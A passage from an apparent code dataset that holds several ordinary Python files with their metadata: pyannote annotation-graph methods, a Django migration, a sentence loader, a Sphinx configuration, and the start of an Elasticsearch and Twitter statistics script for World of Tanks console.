# union of source, target and source-to-target paths
nbunch = from_source & to_target
return self.subgraph(nbunch)
# =========================================================================
def _merge(self, drifting_t, another_t):
"""Helper function to merge `drifting_t` with `another_t`
Assumes that both `drifting_t` and `another_t` exists.
Also assumes that `drifting_t` is an instance of `TFloating`
(otherwise, this might lead to weird graph configuration)
Parameters
----------
drifting_t :
Existing drifting time in graph
another_t :
Existing time in graph
"""
# drifting_t and another_t must exist in graph
# add a (t --> another_t) edge for each (t --> drifting_t) edge
for t, _, key, data in self.in_edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(t, another_t, key=key):
key = None
self.add_edge(t, another_t, key=key, attr_dict=data)
# add a (another_t --> t) edge for each (drifting_t --> t) edge
for _, t, key, data in self.edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(another_t, t, key=key):
key = None
self.add_edge(another_t, t, key=key, attr_dict=data)
# remove drifting_t node (as it was replaced by another_t)
self.remove_node(drifting_t)
def anchor(self, drifting_t, anchored_t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ D ] -- o ==> o -- [ A ] -- o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Anchor `drifting_t` at `anchored_t`
Parameters
----------
drifting_t :
Drifting time to anchor
anchored_t :
When to anchor `drifting_t`
"""
drifting_t = T(drifting_t)
anchored_t = T(anchored_t)
assert (drifting_t in self) and (drifting_t.drifting)
assert anchored_t.anchored
if anchored_t not in self:
self.add_node(anchored_t)
self._merge(drifting_t, anchored_t)
def align(self, one_t, another_t):
"""
Align two (potentially drifting) times
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ F ] -- o o o
⟍ ⟋
==> [ F ]
⟋ ⟍
o -- [ f ] -- o o o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Parameters
----------
one_t, another_t
Two times to be aligned.
Notes
-----
* If both `one_t` and `another_t` are drifting, the resulting graph
will no longer contain `one_t`.
* In case `another_t` is anchored, `align` is equivalent to `anchor`.
* `one_t` and `another_t` cannot be both anchored.
"""
one_t = T(one_t)
another_t = T(another_t)
assert one_t in self
assert another_t in self
# first time is drifting
if one_t.drifting:
self._merge(one_t, another_t)
# second time is drifting
elif another_t.drifting:
self._merge(another_t, one_t)
# both times are anchored --> FAIL
else:
raise ValueError(
'Cannot align two anchored times')
# =========================================================================
def pre_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
p -- [ t1 ] p [ t1 ]
⟍ ⟋
==> [ t ]
⟋ ⟍
p' -- [ t2 ] p' [ t2 ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure --[t1] incoming edges are empty
# because they're going to be removed afterwards,
# and we don't want to loose data
pred1 = self.predecessors(t1)
for p in pred1:
for key, data in self[p][t1].iteritems():
assert not data
# make sure --[t2] incoming edges are empty
# (for the same reason...)
pred2 = self.predecessors(t2)
for p in pred2:
for key, data in self[p][t2].iteritems():
assert not data
# let's get started (remove all incoming edges)
for p in pred1:
for key in list(self[p][t1]):
self.remove_edge(p, t1, key=key)
for p in pred2:
for key in list(self[p][t2]):
self.remove_edge(p, t2, key=key)
for p in set(pred1) | set(pred2):
self.add_edge(p, t)
self.add_edge(t, t1)
self.add_edge(t, t2)
def post_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ t1 ] -- s [ t1 ] s
⟍ ⟋
==> [ t ]
⟋ ⟍
[ t2 ] -- s' [ t2 ] s'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure [t1]-- outgoing edges are empty
# because they're going to be removed afterwards,
# and we don't want to loose data
succ1 = self.successors(t1)
for s in succ1:
for key, data in self[t1][s].iteritems():
assert not data
# make sure --[t2] outgoing edges are empty
# (for the same reason...)
succ2 = self.successors(t2)
for s in succ2:
for key, data in self[t2][s].iteritems():
assert not data
# let's get started (remove all outgoing edges)
for s in succ1:
for key in list(self[t1][s]):
self.remove_edge(t1, s, key=key)
for s in succ2:
for key in list(self[t2][s]):
self.remove_edge(t2, s, key=key)
for s in set(succ1) | set(succ2):
self.add_edge(t, s)
self.add_edge(t1, t)
self.add_edge(t2, t)
# =========================================================================
def ordering_graph(self):
"""Ordering graph
t1 --> t2 in the ordering graph indicates that t1 happens before t2.
A missing edge simply means that it is not clear yet.
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect every pair of anchored times
anchored = sorted(self.anchored())
for t1, t2 in itertools.combinations(anchored, 2):
g.add_edge(t1, t2)
# connect every time with its sucessors
_g = g.copy()
for t1 in _g:
for t2 in set([target for (_, target) in nx.bfs_edges(_g, t1)]):
g.add_edge(t1, t2)
return g
def temporal_sort(self):
"""Get nodes sorted in temporal order
Remark
------
This relies on a combination of temporal ordering of anchored times
and topological ordering for drifting times.
To be 100% sure that one drifting time happens before another time,
check the ordering graph (method .ordering_graph()).
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect pairs of consecutive anchored times
anchored = sorted(self.anchored())
for t1, t2 in pairwise(anchored):
g.add_edge(t1, t2)
return nx.topological_sort(g)
# =========================================================================
def ordered_edges_iter(self, nbunch=None, data=False, keys=False):
"""Return an iterator over the edges in temporal order.
Ordered edges are returned as tuples with optional data and keys
in the order (t1, t2, key, data).
Parameters
----------
nbunch : iterable container, optional (default= all nodes)
A container of nodes. The container will be iterated
through once.
data : bool, optional (default=False)
If True, return edge attribute dict with each edge.
keys : bool, optional (default=False)
If True, return edge keys with each edge.
Returns
-------
edge_iter : iterator
An iterator of (u,v), (u,v,d) or (u,v,key,d) tuples of edges.
Notes
-----
Nodes in nbunch that are not in the graph will be (quietly) ignored.
For the same reason you should not completely trust temporal_sort,
use ordered_edges_iter with care.
"""
# start by sorting nodes in temporal order
nodes = self.temporal_sort()
# only keep nbunch subset (while preserving the order)
if nbunch:
nbunch = list(nbunch)
nodes = [n for n in nodes if n in nbunch]
# iterate over edges using temporal order
return self.edges_iter(nbunch=nodes, data=data, keys=keys)
# =========================================================================
def timerange(self, t1, t2, inside=True, sort=None):
"""Infer edge timerange from graph structure
a -- ... -- [ t1 ] -- A -- ... -- B -- [ t2 ] -- ... -- b
==> [a, b] (inside=False) or [A, B] (inside=True)
Parameters
----------
t1, t2 : anchored or drifting times
inside : boolean, optional
Returns
-------
segment : Segment
"""
t1 = T(t1)
t2 = T(t2)
# in case it is not provided, compute temporal sort
if sort is None:
sort = self.temporal_sort()
# if edge start is anchored, use it as start time
if t1.anchored:
start = t1
# otherwise, look for the closest anchored time in temporal order:
# - just after if inside is True
# - just before otherwise
else:
start = None
# find time index in temporal sort
istart = sort.index(t1)
# search just before or just after depending on 'inside' value
search = sort[istart+1:] if inside else sort[istart-1::-1]
for t in search:
if t.anchored:
start = t
break
# if we could not find any anchored time
# use document end of start depending on 'inside' value
if start is None:
start = TEnd if inside else TStart
# same treatment for the other end of edge
if t2.anchored:
end = t2
else:
end = None
iend = sort.index(t2)
search = sort[iend-1::-1] if inside else sort[iend+1:]
for t in search:
if t.anchored:
end = t
break
if end is None:
end = TStart if inside else TEnd
# return a 'Segment'
return Segment(start=start, end=end)
# =========================================================================
def for_json(self):
return {PYANNOTE_JSON_TRANSCRIPTION: node_link_data(self)}
@classmethod
def from_json(cls, data):
graph = node_link_graph(data[PYANNOTE_JSON_TRANSCRIPTION])
mapping = {node: T(node) for node in graph}
graph = nx.relabel_nodes(graph, mapping)
return cls(graph=graph, **graph.graph)
# === IPython Notebook displays ===========================================
def _repr_svg_(self):
from notebook import repr_transcription
return repr_transcription(self)
| pyannote/core/transcription.py | 18,353 | Transcription stored as annotation graph
Helper function to merge `drifting_t` with `another_t`
Assumes that both `drifting_t` and `another_t` exists.
Also assumes that `drifting_t` is an instance of `TFloating`
(otherwise, this might lead to weird graph configuration)
Parameters
----------
drifting_t :
Existing drifting time in graph
another_t :
Existing time in graph
Add annotation to the graph between times t1 and t2
Parameters
----------
t1, t2: float, str or None
data : dict, optional
{annotation_type: annotation_value} dictionary
Example
-------
>>> G = Transcription()
>>> G.add_edge(T(1.), T(), speaker='John', 'speech'='Hello world!')
Align two (potentially drifting) times
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ F ] -- o o o
⟍ ⟋
==> [ F ]
⟋ ⟍
o -- [ f ] -- o o o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Parameters
----------
one_t, another_t
Two times to be aligned.
Notes
-----
* If both `one_t` and `another_t` are drifting, the resulting graph
will no longer contain `one_t`.
* In case `another_t` is anchored, `align` is equivalent to `anchor`.
* `one_t` and `another_t` cannot be both anchored.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ D ] -- o ==> o -- [ A ] -- o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Anchor `drifting_t` at `anchored_t`
Parameters
----------
drifting_t :
Drifting time to anchor
anchored_t :
When to anchor `drifting_t`
Get list of anchored times
Get minimum subgraph between source time and target time
Parameters
----------
source : Segment
target : float or str, optional
Returns
-------
g : Transcription
Sub-graph between source and target
Get list of drifting times
Return an iterator over the edges in temporal order.
Ordered edges are returned as tuples with optional data and keys
in the order (t1, t2, key, data).
Parameters
----------
nbunch : iterable container, optional (default= all nodes)
A container of nodes. The container will be iterated
through once.
data : bool, optional (default=False)
If True, return edge attribute dict with each edge.
keys : bool, optional (default=False)
If True, return edge keys with each edge.
Returns
-------
edge_iter : iterator
An iterator of (u,v), (u,v,d) or (u,v,key,d) tuples of edges.
Notes
-----
Nodes in nbunch that are not in the graph will be (quietly) ignored.
For the same reason you should not completely trust temporal_sort,
use ordered_edges_iter with care.
Ordering graph
t1 --> t2 in the ordering graph indicates that t1 happens before t2.
A missing edge simply means that it is not clear yet.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ t1 ] -- s [ t1 ] s
⟍ ⟋
==> [ t ]
⟋ ⟍
[ t2 ] -- s' [ t2 ] s'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
p -- [ t1 ] p [ t1 ]
⟍ ⟋
==> [ t ]
⟋ ⟍
p' -- [ t2 ] p' [ t2 ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Relabel drifting nodes
Parameters
----------
mapping : dict, optional
A dictionary with the old labels as keys and new labels as values.
Returns
-------
g : Transcription
New annotation graph
mapping : dict
A dictionary with the new labels as keys and old labels as values.
Can be used to get back to the version before relabelling.
Get nodes sorted in temporal order
Remark
------
This relies on a combination of temporal ordering of anchored times
and topological ordering for drifting times.
To be 100% sure that one drifting time happens before another time,
check the ordering graph (method .ordering_graph()).
Infer edge timerange from graph structure
a -- ... -- [ t1 ] -- A -- ... -- B -- [ t2 ] -- ... -- b
==> [a, b] (inside=False) or [A, B] (inside=True)
Parameters
----------
t1, t2 : anchored or drifting times
inside : boolean, optional
Returns
-------
segment : Segment
!/usr/bin/env python encoding: utf-8 The MIT License (MIT) Copyright (c) 2014 CNRS Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. AUTHORS Hervé BREDIN - http://herve.niderb.fr make sure Ts are connected in correct chronological order sorted list of anchored times will be needed later make sure it is computed only once ~~~ from_source = set of nodes reachable from source ~~~~~~~~~~~~~~~~ source is drifting source is anchored if source is in graph, then it is easy if source is not in graph, find anchored time just before source take no risk! ~~~ to_target = set of nodes from which target is reachable ~~~~~~~~~ target is drifting if target is in graph, then it is easy if target is not in graph, find anchored time just after target take no risk! union of source, target and source-to-target paths ========================================================================= drifting_t and another_t must exist in graph add a (t --> another_t) edge for each (t --> drifting_t) edge use lowest unused integer in case this key already exists add a (another_t --> t) edge for each (drifting_t --> t) edge use lowest unused integer in case this key already exists remove drifting_t node (as it was replaced by another_t) first time is drifting second time is drifting both times are anchored --> FAIL ========================================================================= make sure --[t1] incoming edges are empty because they're going to be removed afterwards, and we don't want to loose data make sure --[t2] incoming edges are empty (for the same reason...) let's get started (remove all incoming edges) make sure [t1]-- outgoing edges are empty because they're going to be removed afterwards, and we don't want to loose data make sure --[t2] outgoing edges are empty (for the same reason...) let's get started (remove all outgoing edges) ========================================================================= add times add existing edges connect every pair of anchored times connect every time with its sucessors add times add existing edges connect pairs of consecutive anchored times ========================================================================= start by sorting nodes in temporal order only keep nbunch subset (while preserving the order) iterate over edges using temporal order ========================================================================= in case it is not provided, compute temporal sort if edge start is anchored, use it as start time otherwise, look for the closest anchored time in temporal order: - just after if inside is True - just before otherwise find time index in temporal sort search just before or just after depending on 'inside' value if we could not find any anchored time use document end of start depending on 'inside' value same treatment for the other end of edge return a 'Segment' ========================================================================= === IPython Notebook displays =========================================== | 8,010 | en | 0.709216 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 09:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lowfat', '0144_auto_20190123_1534'),
]
operations = [
migrations.AddField(
model_name='fund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='fund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
migrations.AddField(
model_name='historicalfund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='historicalfund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
]
| lowfat/migrations/0145_auto_20181213_0921.py | 1,014 | -*- coding: utf-8 -*- Generated by Django 1.11.15 on 2018-12-13 09:21 | 69 | en | 0.598932 |
#!/bin/python
"""
This is a class for loading input sentences
"""
class SentenceAttr:
def __init__(self, attr_list):
self.article_id = attr_list[1]
self.title = attr_list[2]
self.sentence = attr_list[3]
self.article_structure = attr_list[4]
self.place = attr_list[5]
def __str__(self):
return "Article Id: " + self.article_id + "\n" + "Title: " + self.title + "\n"\
+"Sentence: " + self.sentence + "\n" +\
"Article Structure: " + self.article_structure + "\n" + "Place: " + self.place + "\n"
class LoadSentences:
def __init__(self, filepath, num):
self.filepath = filepath
self.num = num
"""对导入的文本做简单清洗"""
def Process(self, line):
line = line.replace('\n', '')
line_list = line.split("|")
return SentenceAttr(line_list)
"""逐行读取文件并返回迭代器"""
def Reader(self):
f = open(self.filepath)
line = f.readline()
count = 0
while line:
if count == self.num:
break
yield self.Process(line)
line = f.readline()
count += 1
f.close()
def test():
sentences_path = "../0_output.txt0.txt"
sentences = LoadSentences(sentences_path, 5).Reader()
for each in sentences:
print(each)
if __name__ == "__main__":
test()
| src/util/load_sentence.py | 1,429 | This is a class for loading input sentences
!/bin/python | 57 | en | 0.850626 |
#!/usr/bin/env python
#
# sqpdfo documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import sqpdfo
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'SQPDFO'
copyright = "2019, Anke Troeltzsch"
author = "Anke Troeltzsch"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = sqpdfo.__version__
# The full version, including alpha/beta/rc tags.
release = sqpdfo.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'sqpdfodoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'sqpdfo.tex',
'SQPDFO Documentation',
'Anke Troeltzsch', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
author,
'sqpdfo',
'One line description of project.',
'Miscellaneous'),
]
| docs/conf.py | 4,774 | !/usr/bin/env python sqpdfo documentation build configuration file, created by sphinx-quickstart on Fri Jun 9 13:47:02 2017. This file is execfile()d with the current directory set to its containing dir. Note that not all possible configuration values are present in this autogenerated file. All configuration values have a default; values that are commented out serve to show the default. If extensions (or modules to document with autodoc) are in another directory, add these directories to sys.path here. If the directory is relative to the documentation root, use os.path.abspath to make it absolute, like shown here. -- General configuration --------------------------------------------- If your documentation needs a minimal Sphinx version, state it here. needs_sphinx = '1.0' Add any Sphinx extension module names here, as strings. They can be extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. Add any paths that contain templates here, relative to this directory. The suffix(es) of source filenames. You can specify multiple suffix as a list of string: source_suffix = ['.rst', '.md'] The master toctree document. General information about the project. The version info for the project you're documenting, acts as replacement for |version| and |release|, also used in various other places throughout the built documents. The short X.Y version. The full version, including alpha/beta/rc tags. The language for content autogenerated by Sphinx. Refer to documentation for a list of supported languages. This is also used if you do content translation via gettext catalogs. Usually you set "language" from the command line for these cases. List of patterns, relative to source directory, that match files and directories to ignore when looking for source files. This patterns also effect to html_static_path and html_extra_path The name of the Pygments (syntax highlighting) style to use. If true, `todo` and `todoList` produce output, else they produce nothing. -- Options for HTML output ------------------------------------------- The theme to use for HTML and HTML Help pages. See the documentation for a list of builtin themes. Theme options are theme-specific and customize the look and feel of a theme further. For a list of options available for each theme, see the documentation. html_theme_options = {} Add any paths that contain custom static files (such as style sheets) here, relative to this directory. They are copied after the builtin static files, so a file named "default.css" will overwrite the builtin "default.css". -- Options for HTMLHelp output --------------------------------------- Output file base name for HTML help builder. -- Options for LaTeX output ------------------------------------------ The paper size ('letterpaper' or 'a4paper'). 'papersize': 'letterpaper', The font size ('10pt', '11pt' or '12pt'). 'pointsize': '10pt', Additional stuff for the LaTeX preamble. 'preamble': '', Latex figure (float) alignment 'figure_align': 'htbp', Grouping the document tree into LaTeX files. List of tuples (source start file, target name, title, author, documentclass [howto, manual, or own class]). -- Options for manual page output ------------------------------------ One entry per manual page. List of tuples (source start file, name, description, authors, manual section). -- Options for Texinfo output ---------------------------------------- Grouping the document tree into Texinfo files. List of tuples (source start file, target name, title, author, dir menu entry, description, category) | 3,555 | en | 0.699926 |
from argparse import ArgumentParser
from collections import OrderedDict
from datetime import datetime, timedelta
from elasticsearch6 import Elasticsearch
from json import dump, load
from math import pi, sin, cos
from matplotlib import pyplot as plt
from matplotlib import dates as mdates
from matplotlib import ticker as mtick
from requests import get
from tweepy import OAuthHandler, API
import traceback
# Multi-day, use gte
battles_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
},
"min_doc_count": 0
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
# Multi-day, use gte
players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
unique_count_query = {
"aggs": {
"2": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"cardinality": {
"field": "account_id"
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
new_players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "created_at",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "created_at",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"created_at": {
"gte": None,
"lt": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
personal_players_query = {
'sort': [],
'_source': {'excludes': []},
'aggs': {
'2': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
}
}
},
'stored_fields': ['_source'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{
'range': {
'date': {
'gt': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
},
'size': 500
}
accounts_per_battles_range_query = {
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [
{'from': 1, 'to': 5},
{'from': 5, 'to': 10},
{'from': 10, 'to': 20},
{'from': 20, 'to': 30},
{'from': 30, 'to': 40},
{'from': 40, 'to': 50},
{'from': 50}
],
'keyed': True
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{'range': {'date': {'gt': None, 'lte': None, 'format': 'date'}}}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
five_battles_a_day_query = {
'aggs': {
'4': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
},
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [{'from': 5, 'to': None}],
'keyed': True
}
}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{
'range': {
'date': {
'gte': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
CW_TANKS = 'ASSIGN `build_cw_tanks_list(config)` TO ME'
cw_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": CW_TANKS,
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
ww2_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "30m",
"time_zone": "America/Chicago",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": 'NOT (' + CW_TANKS + ')',
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
BATTLES_PNG = '/tmp/battles.png'
PLAYERS_PNG = '/tmp/players.png'
NEWPLAYERS_PNG = '/tmp/newplayers.png'
AVERAGE_PNG = '/tmp/average.png'
ACCOUNTAGE_PNG = '/tmp/accountage.png'
BATTLERANGE_PNG = '/tmp/battlerange.png'
FIVEADAY_PNG = '/tmp/fiveaday.png'
PLAYERSLONG_PNG = '/tmp/playerslong.png'
BATTLESLONG_PNG = '/tmp/battleslong.png'
AVERAGELONG_PNG = '/tmp/averagelong.png'
MODEBREAKDOWN_PNG = '/tmp/modebreakdown.png'
MODEBREAKDOWNLONG_PNG = '/tmp/modebreakdownlong.png'
MODEBREAKDOWNPERCENT_PNG = '/tmp/modebreakdownpercent.png'
MODEBREAKDOWNPERCENTLONG_PNG = '/tmp/modebreakdownpercentlong.png'
def manage_config(mode, filename='config.json'):
if mode == 'read':
with open(filename) as f:
return load(f)
elif mode == 'create':
with open(filename, 'w') as f:
dump(
{
'days': 14,
'long term': 90,
'omit errors long term': True,
'twitter': {
'api key': '',
'api secret key': '',
'access token': '',
'access token secret': '',
'message': "Today's update on the active player count and total battles per platform for #worldoftanksconsole."
},
'elasticsearch': {
'hosts': ['127.0.0.1']
},
'battle index': 'diff_battles-*',
'tank index': 'diff_tanks-*',
'unique': [7, 14, 30],
'account age': [7, 30, 90, 180, 365, 730, 1095, 1460, 1825],
'battle ranges': [
{"from": 1, "to": 5},
